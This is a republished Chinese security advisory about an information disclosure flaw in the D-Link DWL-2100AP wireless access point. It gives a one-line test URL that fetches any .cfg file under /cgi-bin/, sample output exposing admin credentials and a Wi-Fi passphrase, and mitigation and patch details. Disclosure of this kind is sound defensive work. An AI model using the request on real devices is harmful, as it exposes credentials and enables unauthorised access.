D-Link DWL-2100AP信息泄漏漏洞
2008-04-09 04:14:51来源:互联网 阅读 ()
发布日期:2006-06-06
更新日期:2006-06-06
受影响系统:
D-Link DWL-2100ap描述:
BUGTRAQ ID: 18299
D-Link DWL-2100ap是一款流行的无线接入点。
如果攻击者对/cgi-bin/目录中任何有.cfg扩展名的文件发起HTTP请求的话,就会返回所有的设备配置,包括 用户名、口令、SSID、IP、子网掩码等。
<*来源:Wendel Guglielmetti Henrique
Intruders Tiger Team Security (http://www.intruders.com.br/)
链接:http://www.intruders.com.br/adv0206en.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg
可返回类似于以下的结果:
# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.
建议:
临时解决方法:
1 - 使用强壮的cookies确保只有授权用户才能访问配置;
2 - 使用哈希储存敏感信息;
3 - 创建防火墙策略过滤端口和IP;
4 - 要求初次登录后更改默认的用户名/口令,不允许将口令更改为最近一次使用的;
5 - 使用HTTPS。
厂商补丁:
D-Link
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfp
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
